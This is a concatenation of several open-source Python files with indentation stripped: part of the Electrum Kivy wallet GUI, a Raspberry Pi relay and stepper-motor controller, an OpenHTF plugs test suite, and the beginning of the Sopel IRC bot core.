return ''
except NotEnoughFunds:
return ''
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
return ''
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
return format_satoshis_plain(amount_after_all_fees, self.decimal_point())
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, 0, self.decimal_point(), is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, x):
return format_satoshis_plain(x, self.decimal_point()) + ' ' + self.base_unit
def format_fee_rate(self, fee_rate):
# fee_rate is in sat/kB
return format_fee_satoshis(fee_rate/1000) + ' sat/byte'
#@profiler
def update_wallet(self, *dt):
self._trigger_update_status()
if self.wallet and (self.wallet.up_to_date or not self.network or not self.network.is_connected()):
self.update_tabs()
def notify(self, message):
try:
global notification, os
if not notification:
from plyer import notification
icon = (os.path.dirname(os.path.realpath(__file__))
+ '/../../' + self.icon)
notification.notify('Electrum', message,
app_icon=icon, app_name='Electrum')
except ImportError:
Logger.Error('Notification: needs plyer; `sudo python3 -m pip install plyer`')
def on_pause(self):
self.pause_time = time.time()
# pause nfc
if self.nfcscanner:
self.nfcscanner.nfc_disable()
return True
def on_resume(self):
now = time.time()
if self.wallet and self.wallet.has_password() and now - self.pause_time > 60:
self.password_dialog(wallet=self.wallet, msg=_('Enter PIN'), on_success=None, on_failure=self.stop)
if self.nfcscanner:
self.nfcscanner.nfc_enable()
def on_size(self, instance, value):
width, height = value
self._orientation = 'landscape' if width > height else 'portrait'
self._ui_mode = 'tablet' if min(width, height) > inch(3.51) else 'phone'
def on_ref_label(self, label):
if not label.data:
return
self.qr_dialog(label.name, label.data, True)
def show_error(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, icon='atlas://electrum/gui/kivy/theming/light/error', duration=0,
modal=False):
''' Show an error Message Bubble.
'''
self.show_info_bubble( text=error, icon=icon, width=width,
pos=pos or Window.center, arrow_pos=arrow_pos, exit=exit,
duration=duration, modal=modal)
def show_info(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, duration=0, modal=False):
''' Show an Info Message Bubble.
'''
self.show_error(error, icon='atlas://electrum/gui/kivy/theming/light/important',
duration=duration, modal=modal, exit=exit, pos=pos,
arrow_pos=arrow_pos)
def show_info_bubble(self, text=_('Hello World'), pos=None, duration=0,
arrow_pos='bottom_mid', width=None, icon='', modal=False, exit=False):
'''Method to show an Information Bubble
.. parameters::
text: Message to be displayed
pos: position for the bubble
duration: duration the bubble remains on screen. 0 = click to hide
width: width of the Bubble
arrow_pos: arrow position for the bubble
'''
info_bubble = self.info_bubble
if not info_bubble:
info_bubble = self.info_bubble = Factory.InfoBubble()
win = Window
if info_bubble.parent:
win.remove_widget(info_bubble
if not info_bubble.modal else
info_bubble._modal_view)
if not arrow_pos:
info_bubble.show_arrow = False
else:
info_bubble.show_arrow = True
info_bubble.arrow_pos = arrow_pos
img = info_bubble.ids.img
if text == 'texture':
# icon holds a texture not a source image
# display the texture in full screen
text = ''
img.texture = icon
info_bubble.fs = True
info_bubble.show_arrow = False
img.allow_stretch = True
info_bubble.dim_background = True
info_bubble.background_image = 'atlas://electrum/gui/kivy/theming/light/card'
else:
info_bubble.fs = False
info_bubble.icon = icon
#if img.texture and img._coreimage:
# img.reload()
img.allow_stretch = False
info_bubble.dim_background = False
info_bubble.background_image = 'atlas://data/images/defaulttheme/bubble'
info_bubble.message = text
if not pos:
pos = (win.center[0], win.center[1] - (info_bubble.height/2))
info_bubble.show(pos, duration, width, modal=modal, exit=exit)
def tx_dialog(self, tx):
from .uix.dialogs.tx_dialog import TxDialog
d = TxDialog(self, tx)
d.open()
def sign_tx(self, *args):
threading.Thread(target=self._sign_tx, args=args).start()
def _sign_tx(self, tx, password, on_success, on_failure):
try:
self.wallet.sign_transaction(tx, password)
except InvalidPassword:
Clock.schedule_once(lambda dt: on_failure(_("Invalid PIN")))
return
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
Clock.schedule_once(lambda dt: on_success(tx))
def _broadcast_thread(self, tx, on_complete):
status = False
try:
self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
except TxBroadcastError as e:
msg = e.get_message_for_gui()
except BestEffortRequestFailed as e:
msg = repr(e)
else:
status, msg = True, tx.txid()
Clock.schedule_once(lambda dt: on_complete(status, msg))
def broadcast(self, tx):
def on_complete(ok, msg):
if ok:
self.show_info(_('Payment sent.'))
if self.send_screen:
self.send_screen.do_clear()
else:
msg = msg or ''
self.show_error(msg)
if self.network and self.network.is_connected():
self.show_info(_('Sending'))
threading.Thread(target=self._broadcast_thread, args=(tx, on_complete)).start()
else:
self.show_info(_('Cannot broadcast transaction') + ':\n' + _('Not connected'))
def description_dialog(self, screen):
from .uix.dialogs.label_dialog import LabelDialog
text = screen.message
def callback(text):
screen.message = text
d = LabelDialog(_('Enter description'), text, callback)
d.open()
def amount_dialog(self, screen, show_max):
from .uix.dialogs.amount_dialog import AmountDialog
amount = screen.amount
if amount:
amount, u = str(amount).split()
assert u == self.base_unit
def cb(amount):
screen.amount = amount
popup = AmountDialog(show_max, amount, cb)
popup.open()
def addresses_dialog(self):
from .uix.dialogs.addresses import AddressesDialog
if self._addresses_dialog is None:
self._addresses_dialog = AddressesDialog(self)
self._addresses_dialog.update()
self._addresses_dialog.open()
def fee_dialog(self, label, dt):
from .uix.dialogs.fee_dialog import FeeDialog
def cb():
self.fee_status = self.electrum_config.get_fee_status()
fee_dialog = FeeDialog(self, self.electrum_config, cb)
fee_dialog.open()
def on_fee(self, event, *arg):
self.fee_status = self.electrum_config.get_fee_status()
def protected(self, msg, f, args):
if self.wallet.has_password():
on_success = lambda pw: f(*(args + (pw,)))
self.password_dialog(wallet=self.wallet, msg=msg, on_success=on_success, on_failure=lambda: None)
else:
f(*(args + (None,)))
def toggle_lightning(self):
if self.wallet.has_lightning():
if not bool(self.wallet.lnworker.channels):
warning = _('This will delete your lightning private keys')
d = Question(_('Disable Lightning?') + '\n\n' + warning, self._disable_lightning)
d.open()
else:
self.show_info('This wallet has channels')
else:
warning1 = _("Lightning support in Electrum is experimental. Do not put large amounts in lightning channels.")
warning2 = _("Funds stored in lightning channels are not recoverable from your seed. You must backup your wallet file everytime you create a new channel.")
d = Question(_('Enable Lightning?') + '\n\n' + warning1 + '\n\n' + warning2, self._enable_lightning)
d.open()
def _enable_lightning(self, b):
if not b:
return
wallet_path = self.get_wallet_path()
self.wallet.init_lightning()
self.show_info(_('Lightning keys have been initialized.'))
self.stop_wallet()
self.load_wallet_by_name(wallet_path)
def _disable_lightning(self, b):
if not b:
return
wallet_path = self.get_wallet_path()
self.wallet.remove_lightning()
self.show_info(_('Lightning keys have been removed.'))
self.stop_wallet()
self.load_wallet_by_name(wallet_path)
def delete_wallet(self):
basename = os.path.basename(self.wallet.storage.path)
d = Question(_('Delete wallet?') + '\n' + basename, self._delete_wallet)
d.open()
def _delete_wallet(self, b):
if b:
basename = self.wallet.basename()
self.protected(_("Enter your PIN code to confirm deletion of {}").format(basename), self.__delete_wallet, ())
def __delete_wallet(self, pw):
wallet_path = self.get_wallet_path()
basename = os.path.basename(wallet_path)
if self.wallet.has_password():
try:
self.wallet.check_password(pw)
except:
self.show_error("Invalid PIN")
return
self.stop_wallet()
os.unlink(wallet_path)
self.show_error(_("Wallet removed: {}").format(basename))
new_path = self.electrum_config.get_wallet_path(use_gui_last_wallet=True)
self.load_wallet_by_name(new_path)
def show_seed(self, label):
self.protected(_("Enter your PIN code in order to decrypt your seed"), self._show_seed, (label,))
def _show_seed(self, label, password):
if self.wallet.has_password() and password is None:
return
keystore = self.wallet.keystore
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except:
self.show_error("Invalid PIN")
return
label.data = seed
if passphrase:
label.data += '\n\n' + _('Passphrase') + ': ' + passphrase
def password_dialog(self, *, wallet: Union[Abstract_Wallet, WalletStorage],
msg: str, on_success: Callable = None, on_failure: Callable = None):
from .uix.dialogs.password_dialog import PasswordDialog
if self._password_dialog is None:
self._password_dialog = PasswordDialog()
self._password_dialog.init(self, wallet=wallet, msg=msg,
on_success=on_success, on_failure=on_failure)
self._password_dialog.open()
def change_password(self, cb):
from .uix.dialogs.password_dialog import PasswordDialog
if self._password_dialog is None:
self._password_dialog = PasswordDialog()
message = _("Changing PIN code.") + '\n' + _("Enter your current PIN:")
def on_success(old_password, new_password):
self.wallet.update_password(old_password, new_password)
self.show_info(_("Your PIN code was updated"))
on_failure = lambda: self.show_error(_("PIN codes do not match"))
self._password_dialog.init(self, wallet=self.wallet, msg=message,
on_success=on_success, on_failure=on_failure, is_change=1)
self._password_dialog.open()
def export_private_keys(self, pk_label, addr):
if self.wallet.is_watching_only():
self.show_info(_('This is a watching-only wallet. It does not contain private keys.'))
return
def show_private_key(addr, pk_label, password):
if self.wallet.has_password() and password is None:
return
if not self.wallet.can_export():
return
try:
key = str(self.wallet.export_private_key(addr, password))
pk_label.data = key
except InvalidPassword:
self.show_error("Invalid PIN")
return
self.protected(_("Enter your PIN code in order to decrypt your private key"), show_private_key, (addr, pk_label))
|
device_controller.py
|
'''
Created on 2013.09.21.
'''
import RPi.GPIO as GPIO
import time
import os
from threading import Thread
from config.config import SensorConfig
class RelayController(object):
relayGpio = None
talkThread = None
motoFwThread = None
motoBwThread = None
runMoto = False
w1 = None
w2 = None
w3 = None
w4 = None
def __init__(self, relayGpio=SensorConfig.GPIO_RELAY_IN_1, delay=SensorConfig.TIME_MOTOR_SPEED_FAST):
self.relayGpio = relayGpio
GPIO.setmode(GPIO.BCM)
GPIO.setup(self.relayGpio, GPIO.OUT)
GPIO.output(self.relayGpio, 1)
GPIO.setmode(GPIO.BCM)
#GPIO.setup(SensorConfig.GPIO_MOTOR_ENABLE, GPIO.OUT)
GPIO.setup(SensorConfig.GPIO_MOTOR_IN_1, GPIO.OUT)
GPIO.setup(SensorConfig.GPIO_MOTOR_IN_2, GPIO.OUT)
GPIO.setup(SensorConfig.GPIO_MOTOR_IN_3, GPIO.OUT)
GPIO.setup(SensorConfig.GPIO_MOTOR_IN_4, GPIO.OUT)
#GPIO.output(GPIO_MOTOR_ENABLE, 1)
self.delay = delay
def setStep(self, w1, w2, w3, w4):
GPIO.output(SensorConfig.GPIO_MOTOR_IN_1, w1)
GPIO.output(SensorConfig.GPIO_MOTOR_IN_2, w2)
GPIO.output(SensorConfig.GPIO_MOTOR_IN_3, w3)
GPIO.output(SensorConfig.GPIO_MOTOR_IN_4, w4)
def startMotoFw(self):
while(self.runMoto == True):
self.setStep(1,0,0,1)
time.sleep(self.delay)
self.setStep(1,1,0,0)
time.sleep(self.delay)
self.setStep(0,1,1,0)
time.sleep(self.delay)
self.setStep(0,0,1,1)
time.sleep(self.delay)
def setOn(self):
if(GPIO.input(self.relayGpio) == 1):
self.talkThread = Thread(target=self.talkOn)
self.talkThread.start()
GPIO.output(self.relayGpio, 0)
def setOff(self):
GPIO.output(self.relayGpio, 1)
def switch(self):
GPIO.output(self.relayGpio, not GPIO.input(self.relayGpio))
if self.motoFwThread == None:
self.runMoto = True
self.motoFwThread = Thread(target=self.startMotoFw)
self.motoFwThread.start()
else:
self.motoFwThread = None
self.runMoto = False
def isRelayOn(self):
GPIO.input(self.relayGpio)
def talkOn(self):
os.system('espeak -vf3 "turning on the light"')
self.talkThread = None
class MotorController(object):
w1 = None
w2 = None
w3 = None
w4 = None
def __init__(self, delay=SensorConfig.TIME_MOTOR_SPEED_FAST):
GPIO.setmode(GPIO.BCM)
#GPIO.setup(GPIO_MOTOR_ENABLE, GPIO.OUT)
GPIO.setup(SensorConfig.GPIO_MOTOR_IN_1, GPIO.OUT)
GPIO.setup(SensorConfig.GPIO_MOTOR_IN_2, GPIO.OUT)
GPIO.setup(SensorConfig.GPIO_MOTOR_IN_3, GPIO.OUT)
GPIO.setup(SensorConfig.GPIO_MOTOR_IN_4, GPIO.OUT)
#GPIO.output(GPIO_MOTOR_ENABLE, 1)
self.delay = delay
def setStep(w1, w2, w3, w4):
GPIO.output(SensorConfig.GPIO_MOTOR_IN_1, w1)
GPIO.output(SensorConfig.GPIO_MOTOR_IN_2, w2)
GPIO.output(SensorConfig.GPIO_MOTOR_IN_3, w3)
GPIO.output(SensorConfig.GPIO_MOTOR_IN_4, w4)
def backward1p(steps):
for i in range(0, steps):
self.setStep(0, 0, 0, 1)
time.sleep(self.delay)
self.setStep(0, 0, 1, 0)
time.sleep(self.delay)
self.setStep(0, 1, 0, 0)
time.sleep(self.delay)
self.setStep(1, 0, 0, 0)
time.sleep(self.delay)
def forward1p(steps):
for i in range(0, steps):
self.setStep(1, 0, 0, 0)
time.sleep(self.delay)
self.setStep(0, 1, 0, 0)
time.sleep(self.delay)
self.setStep(0, 0, 1, 0)
time.sleep(self.delay)
self.setStep(0, 0, 0, 1)
time.sleep(self.delay)
def backward2p(steps):
for i in range(0, steps):
setStep(0, 0, 1, 1)
time.sleep(self.delay)
setStep(0, 1, 1, 0)
time.sleep(self.delay)
setStep(1, 1, 0, 0)
time.sleep(self.delay)
setStep(1, 0, 0, 1)
time.sleep(self.delay)
def forward2p(steps):
for i in range(0, steps):
setStep(1, 0, 0, 1)
time.sleep(self.delay)
setStep(1, 1, 0, 0)
time.sleep(self.delay)
setStep(0, 1, 1, 0)
time.sleep(self.delay)
setStep(0, 0, 1, 1)
time.sleep(self.delay)
|
plugs_test.py
|
# Copyright 2016 Google Inc. All Rights Reserved.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import threading
import time
import mock
import openhtf
from openhtf import plugs
from openhtf.util import test
class AdderPlug(plugs.FrontendAwareBasePlug):
INSTANCE_COUNT = 0
LAST_INSTANCE = None
def __init__(self):
super(AdderPlug, self).__init__()
type(self).INSTANCE_COUNT += 1
type(self).LAST_INSTANCE = self
self.state = 'CREATED'
self.number = 0
def _asdict(self):
return {'number': self.number}
def increment(self):
self.number += 1
self.notify_update()
return self.number
def tearDown(self):
self.state = 'TORN DOWN'
class AdderSubclassPlug(AdderPlug):
pass
class DummyPlug(plugs.BasePlug):
pass
class TearDownRaisesPlug1(plugs.BasePlug):
TORN_DOWN = False
def tearDown(self):
type(self).TORN_DOWN = True
raise Exception()
class TearDownRaisesPlug2(plugs.BasePlug):
TORN_DOWN = False
def tearDown(self):
type(self).TORN_DOWN = True
raise Exception()
class PlugsTest(test.TestCase):
def setUp(self):
self.plug_manager = plugs.PlugManager(
{AdderPlug}, record_logger_name='mock.logger.for.openhtf')
AdderPlug.INSTANCE_COUNT = 0
def tearDown(self):
self.plug_manager.tear_down_plugs()
def test_base_plug(self):
plug = plugs.BasePlug()
self.assertEqual({}, plug._asdict())
plug.tearDown()
def test_initialize(self):
self.assertEqual(0, AdderPlug.INSTANCE_COUNT)
self.plug_manager.initialize_plugs()
self.assertEqual(1, AdderPlug.INSTANCE_COUNT)
self.plug_manager.initialize_plugs()
self.assertEqual(1, AdderPlug.INSTANCE_COUNT)
self.plug_manager.initialize_plugs({AdderPlug})
self.assertEqual(1, AdderPlug.INSTANCE_COUNT)
self.assertIs(
AdderPlug.LAST_INSTANCE,
self.plug_manager.provide_plugs(
(('adder_plug', AdderPlug),))['adder_plug'])
adder_plug_name = AdderPlug.__module__ + '.AdderPlug'
self.assertEqual(
{
adder_plug_name: {'mro': [adder_plug_name]}
},
self.plug_manager._asdict()['plug_descriptors']
)
self.assertEqual(
{
adder_plug_name: {'number': 0}
},
self.plug_manager._asdict()['plug_states']
)
self.assertEqual('CREATED', AdderPlug.LAST_INSTANCE.state)
@test.yields_phases
def test_multiple_plugs(self):
@plugs.plug(adder_plug=AdderPlug)
@plugs.plug(other_plug=AdderPlug)
def dummy_phase(test_api, adder_plug, other_plug):
self.assertEqual(1, AdderPlug.INSTANCE_COUNT)
self.assertIs(AdderPlug.LAST_INSTANCE, adder_plug)
self.assertIs(AdderPlug.LAST_INSTANCE, other_plug)
yield dummy_phase
@plugs.plug(adder_plug=AdderPlug,
other_plug=plugs.BasePlug)
def dummy_phase(test_api, adder_plug, other_plug):
self.assertEqual(1, AdderPlug.INSTANCE_COUNT)
self.assertIs(AdderPlug.LAST_INSTANCE, adder_plug)
yield dummy_phase
@test.yields_phases
def test_plug_logging(self):
"""Test that both __init__ and other functions get the good logger."""
class LoggingPlug(plugs.BasePlug):
def __init__(self):
self.logger_seen_init = self.logger
def action(self):
self.logger_seen_action = self.logger
@plugs.plug(logger=LoggingPlug)
def dummy_phase(test_api, logger):
logger.action()
self.assertIs(logger.logger_seen_init, logger.logger_seen_action)
self.assertIs(logger.logger_seen_init, self.logger)
yield dummy_phase
def test_tear_down_raises(self):
"""Test that all plugs get torn down even if some raise."""
self.plug_manager.initialize_plugs({
TearDownRaisesPlug1, TearDownRaisesPlug2})
self.plug_manager.tear_down_plugs()
self.assertTrue(TearDownRaisesPlug1.TORN_DOWN)
self.assertTrue(TearDownRaisesPlug2.TORN_DOWN)
def test_plug_updates(self):
self.plug_manager.initialize_plugs({AdderPlug})
adder_plug_name = AdderPlug.__module__ + '.AdderPlug'
update = self.plug_manager.wait_for_plug_update(
adder_plug_name, {}, .001)
self.assertEqual({'number': 0}, update)
# No update since last time, this should time out (return None).
self.assertIsNone(self.plug_manager.wait_for_plug_update(
adder_plug_name, update, .001))
def _delay_then_update():
time.sleep(.5)
self.assertEqual(1, AdderPlug.LAST_INSTANCE.increment())
threading.Thread(target=_delay_then_update).start()
start_time = time.time()
self.assertEqual({'number': 1}, self.plug_manager.wait_for_plug_update(
adder_plug_name, update, 5))
self.assertGreater(time.time() - start_time, .2)
def test_invalid_plug(self):
with self.assertRaises(plugs.InvalidPlugError):
self.plug_manager.initialize_plugs({object})
with self.assertRaises(plugs.InvalidPlugError):
plugs.plug(adder_plug=object)
with self.assertRaises(plugs.InvalidPlugError):
self.plug_manager.initialize_plugs({
type('BadPlug', (plugs.BasePlug,), {'logger': None})})
with self.assertRaises(plugs.InvalidPlugError):
class BadPlugInit(plugs.BasePlug):
def __init__(self):
self.logger = None
self.plug_manager.initialize_plugs({BadPlugInit})
with self.assertRaises(plugs.InvalidPlugError):
self.plug_manager.wait_for_plug_update('invalid', {}, 0)
def test_duplicate_plug(self):
with self.assertRaises(plugs.DuplicatePlugError):
@plugs.plug(adder_plug=AdderPlug)
@plugs.plug(adder_plug=AdderPlug)
def dummy_phase(test, adder_plug):
pass
def test_uses_base_tear_down(self):
self.assertTrue(plugs.BasePlug().uses_base_tear_down())
self.assertTrue(DummyPlug().uses_base_tear_down())
self.assertFalse(AdderPlug().uses_base_tear_down())
self.assertFalse(AdderSubclassPlug().uses_base_tear_down())
self.assertFalse(TearDownRaisesPlug1().uses_base_tear_down())
|
bot.py
|
# coding=utf-8
# Copyright 2008, Sean B. Palmer, inamidst.com
# Copyright © 2012, Elad Alfassa <elad@fedoraproject.org>
# Copyright 2012-2015, Elsie Powell, http://embolalia.com
#
# Licensed under the Eiffel Forum License 2.
from __future__ import unicode_literals, absolute_import, print_function, division
from ast import literal_eval
import collections
import os
import re
import sys
import threading
import time
from sopel import tools
from sopel import irc
from sopel.db import SopelDB
from sopel.tools import stderr, Identifier
import sopel.tools.jobs
from sopel.trigger import Trigger
from sopel.module import NOLIMIT
from sopel.logger import get_logger
import sopel.loader
LOGGER = get_logger(__name__)
if sys.version_info.major >= 3:
unicode = str
basestring = str
py3 = True
else:
py3 = False
class _CapReq(object):
def __init__(self, prefix, module, failure=None, arg=None, success=None):
def nop(bot, cap):
pass
# TODO at some point, reorder those args to be sane
self.prefix = prefix
self.module = module
self.arg = arg
self.failure = failure or nop
self.success = success or nop
class Sopel(irc.Bot):
def __init__(self, config, daemon=False):
irc.Bot.__init__(self, config)
self._daemon = daemon # Used for iPython. TODO something saner here
# `re.compile('.*') is re.compile('.*')` because of caching, so we need
# to associate a list with each regex, since they are unexpectedly
# indistinct.
self._callables = {
'high': collections.defaultdict(list),
'medium': collections.defaultdict(list),
'low': collections.defaultdict(list)
}
self.config = config
"""The :class:`sopel.config.Config` for the current Sopel instance."""
self.doc = {}
"""
A dictionary of command names to their docstring and example, if
declared. The first item in a callable's commands list is used as the
key in version *3.2* onward. Prior to *3.2*, the name of the function
as declared in the source code was used.
"""
self._command_groups = collections.defaultdict(list)
"""A mapping of module names to a list of commands in it."""
self.stats = {} # deprecated, remove in 7.0
self._times = {}
"""
A dictionary mapping lower-case'd nicks to dictionaries which map
funtion names to the time which they were last used by that nick.
"""
self.server_capabilities = {}
"""A dict mapping supported IRCv3 capabilities to their options.
For example, if the server specifies the capability ``sasl=EXTERNAL``,
it will be here as ``{"sasl": "EXTERNAL"}``. Capabilities specified
without any options will have ``None`` as the value.
For servers that do not support IRCv3, this will be an empty set."""
self.enabled_capabilities = set()
"""A set containing the IRCv3 capabilities that the bot has enabled."""
self._cap_reqs = dict()
"""A dictionary of capability names to a list of requests"""
self.privileges = dict()
"""A dictionary of channels to their users and privilege levels
The value associated with each channel is a dictionary of
:class:`sopel.tools.Identifier`\\s to
a bitwise integer value, determined by combining the appropriate
constants from :mod:`sopel.module`.
.. deprecated:: 6.2.0
Use :attr:`channels` instead.
"""
self.channels = tools.SopelMemory() # name to chan obj
"""A map of the channels that Sopel is in.
The keys are Identifiers of the channel names, and map to
:class:`sopel.tools.target.Channel` objects which contain the users in
the channel and their permissions.
"""
self.users = tools.SopelMemory() # name to user obj
"""A map of the users that Sopel is aware of.
The keys are Identifiers of the nicknames, and map to
:class:`sopel.tools.target.User` instances. In order for Sopel to be
aware of a user, it must be in at least one channel which they are also
in.
"""
self.db = SopelDB(config)
"""The bot's database, as a :class:`sopel.db.SopelDB` instance."""
self.memory = tools.SopelMemory()
"""
A thread-safe dict for storage of runtime data to be shared between
modules. See :class:`sopel.tools.Sopel.SopelMemory`
"""
self.shutdown_methods = []
"""List of methods to call on shutdown"""
self.scheduler = sopel.tools.jobs.JobScheduler(self)
self.scheduler.start()
# Set up block lists
# Default to empty
if not self.config.core.nick_blocks:
self.config.core.nick_blocks = []
if not self.config.core.host_blocks:
self.config.core.host_blocks = []
self.setup()
@property
def hostmask(self):
"""str: the current hostmask for the bot :class:`sopel.tools.target.User`
Bot must be connected and in at least one channel.
"""
if not self.users or not self.users.contains(self.nick):
raise KeyError("'hostmask' not available: bot must be connected and in at least one channel.")
return self.users.get(self.nick).hostmask
# Backwards-compatibility aliases to attributes made private in 6.2. Remove
# these in 7.0
times = property(lambda self: getattr(self, '_times'))
command_groups = property(lambda self: getattr(self, '_command_groups'))
def write(self, args, text=None): # Shim this in here for autodocs
"""Send a command to the server.
``args`` is an iterable of strings, which are joined by spaces.
``text`` is treated as though it were the final item in ``args``, but
is preceeded by a ``:``. This is a special case which means that
``text``, unlike the items in ``args`` may contain spaces (though this
constraint is not checked by ``write``).
In other words, both ``sopel.write(('PRIVMSG',), 'Hello, world!')``
and ``sopel.write(('PRIVMSG', ':Hello, world!'))`` will send
``PRIVMSG :Hello, world!`` to the server.
Newlines and carriage returns ('\\n' and '\\r') are removed before
sending. Additionally, if the message (after joining) is longer than
than 510 characters, any remaining characters will not be sent.
"""
irc.Bot.write(self, args, text=text)
def setup(self):
stderr("\nWelcome to Sopel. Loading modules...\n\n")
modules = sopel.loader.enumerate_modules(self.config)
error_count = 0
success_count = 0
for name in modules:
path, type_ = modules[name]
try:
module, _ = sopel.loader.load_module(name, path, type_)
except Exception as e:
error_count = error_count + 1
filename, lineno = tools.get_raising_file_and_line()
rel_path = os.path.relpath(filename, os.path.dirname(__file__))
raising_stmt = "%s:%d" % (rel_path, lineno)
stderr("Error loading %s: %s (%s)" % (name, e, raising_stmt))
else:
try:
if hasattr(module, 'setup'):
module.setup(self)
relevant_parts = sopel.loader.clean_module(
module, self.config)
except Exception as e:
error_count = error_count + 1
filename, lineno = tools.get_raising_file_and_line()
rel_path = os.path.relpath(
filename, os.path.dirname(__file__)
)
raising_stmt = "%s:%d" % (rel_path, lineno)
stderr("Error in %s setup procedure: %s (%s)"
% (name, e, raising_stmt))
else:
self.register(*relevant_parts)
success_count += 1
if len(modules) > 1: # coretasks is counted
stderr('\n\nRegistered %d modules,' % (success_count - 1))
stderr('%d modules failed to load\n\n' % error_count)
else:
stderr("Warning: Couldn't load any modules")
def unregister(self, obj):
if not callable(obj):
return
if hasattr(obj, 'rule'): # commands and intents have it added
for rule in obj.rule:
callb_list = self._callables[obj.priority][rule]
if obj in callb_list:
callb_list.remove(obj)
if hasattr(obj, 'interval'):
# TODO this should somehow find the right job to remove, rather than
# clearing the entire queue. Issue #831
self.scheduler.clear_jobs()
if (getattr(obj, '__name__', None) == 'shutdown' and
obj in self.shutdown_methods):
self.shutdown_methods.remove(obj)
def register(self, callables, jobs, shutdowns, urls):
# Append module's shutdown function to the bot's list of functions to
# call on shutdown
self.shutdown_methods += shutdowns
for callbl in callables:
if hasattr(callbl, 'rule'):
for rule in callbl.rule:
self._callables[callbl.priority][rule].append(callbl)
else:
self._callables[callbl.priority][re.compile('.*')].append(callbl)
if hasattr(callbl, 'commands'):
module_name = callbl.__module__.rsplit('.', 1)[-1]
# TODO doc and make decorator for this. Not sure if this is how
# it should work yet, so not making it public for 6.0.
category = getattr(callbl, 'category', module_name)
self._command_groups[category].append(callbl.commands[0])
for command, docs in callbl._docs.items():
self.doc[command] = docs
for func in jobs:
for interval in func.interval:
job = sopel.tools.jobs.Job(interval, func)
self.scheduler.add_job(job)
for func in urls:
self.register_url_callback(func.url_regex, func)
def part(self, channel, msg=None):
"""Part a channel."""
self.write(['PART', channel], msg)
def join(self, channel, password=None):
"""Join a channel
If `channel` contains a space, and no `password` is given, the space is
assumed to split the argument into the channel to join and its
password. `channel` should not contain a space if `password` is given.
"""
if password is None:
self.write(('JOIN', channel))
else:
self.write(['JOIN', channel, password])
def msg(self, recipient, text, max_messages=1):
# Deprecated, but way too much of a pain to remove.
self.say(text, recipient, max_messages)
def say(self, text, recipient, max_messages=1):
"""Send ``text`` as a PRIVMSG to ``recipient``.
In the context of a triggered callable, the ``recipient`` defaults to
the channel (or nickname, if a private message) from which the message
was received.
By default, this will attempt to send the entire ``text`` in one
message. If the text is too long for the server, it may be truncated.
If ``max_messages`` is given, the ``text`` will be split into at most
that many messages, each no more than 400 bytes. The split is made at
the last space character before the 400th byte, or at the 400th byte if
no such space exists. If the ``text`` is too long to fit into the
specified number of messages using the above splitting, the final
message will contain the entire remainder, which may be truncated by
the server.
"""
excess = ''
if not isinstance(text, unicode):
# Make sure we are dealing with unicode string
text = text.decode('utf-8')
if max_messages > 1:
# Manage multi-line only when needed
text, excess = tools.get_sendable_message(text)
try:
self.sending.acquire()
# No messages within the last 3 seconds? Go ahead!
# Otherwise, wait so it's been at least 0.8 seconds + penalty
recipient_id = Identifier(recipient)
if recipient_id not in self.stack:
self.stack[recipient_id] = []
elif self.stack[recipient_id]:
elapsed = time.time() - self.stack[recipient_id][-1][0]
if elapsed < 3:
penalty = float(max(0, len(text) - 40)) / 70
wait = min(0.8 + penalty, 2) # Never wait more than 2 seconds
if elapsed < wait:
time.sleep(wait - elapsed)
# Loop detection
messages = [m[1] for m in self.stack[recipient_id][-8:]]
# If what we about to send repeated at least 5 times in the
# last 2 minutes, replace with '...'
if messages.count(text) >= 5 and elapsed < 120:
text = '...'
if messages.count('...') >= 3:
# If we said '...' 3 times, discard message
return
self.write(('PRIVMSG', recipient), text)
self.stack[recipient_id].append((time.time(), self.safe(text)))
self.stack[recipient_id] = self.stack[recipient_id][-10:]
finally:
self.sending.release()
# Now that we've sent the first part, we need to send the rest. Doing
# this recursively seems easier to me than iteratively
if excess:
self.msg(recipient, excess, max_messages - 1)
def notice(self, text, dest):
"""Send an IRC NOTICE to a user or a channel.
Within the context of a triggered callable, ``dest`` will default to
the channel (or nickname, if a private message), in which the trigger
happened.
"""
self.write(('NOTICE', dest), text)
def action(self, text, dest):
"""Send ``text`` as a CTCP ACTION PRIVMSG to ``dest``.
The same loop detection and length restrictions apply as with
:func:`say`, though automatic message splitting is not available.
Within the context of a triggered callable, ``dest`` will default to
the channel (or nickname, if a private message), in which the trigger
happened.
"""
self.say('\001ACTION {}\001'.format(text), dest)
def reply(self, text, dest, reply_to, notice=False):
"""Prepend ``reply_to`` to ``text``, and send as a PRIVMSG to ``dest``.
If ``notice`` is ``True``, send a NOTICE rather than a PRIVMSG.
The same loop detection and length restrictions apply as with
:func:`say`, though automatic message splitting is not available.
Within the context of a triggered callable, ``reply_to`` will default to
the nickname of the user who triggered the call, and ``dest`` to the
channel (or nickname, if a private message), in which the trigger
happened.
"""
text = '%s: %s' % (reply_to, text)
if notice:
self.notice(text, dest)
else:
self.say(text, dest)
def call(self, func, sopel, trigger):
nick = trigger.nick
current_time = time.time()
if nick not in self._times:
self._times[nick] = dict()
if self.nick not in self._times:
self._times[self.nick] = dict()
if not trigger.is_privmsg and trigger.sender not in self._times:
self._times[trigger.sender] = dict()
if not trigger.admin and not func.unblockable:
if func in self._times[nick]:
usertimediff = current_time - self._times[nick][func]
if func.rate > 0 and usertimediff < func.rate:
LOGGER.info(
"%s prevented from using %s in %s due to user limit: %d < %d",
trigger.nick, func.__name__, trigger.sender, usertimediff,
func.rate
)
return
if func in self._times[self.nick]:
globaltimediff = current_time - self._times[self.nick][func]
if func.global_rate > 0 and globaltimediff < func.global_rate:
LOGGER.info(
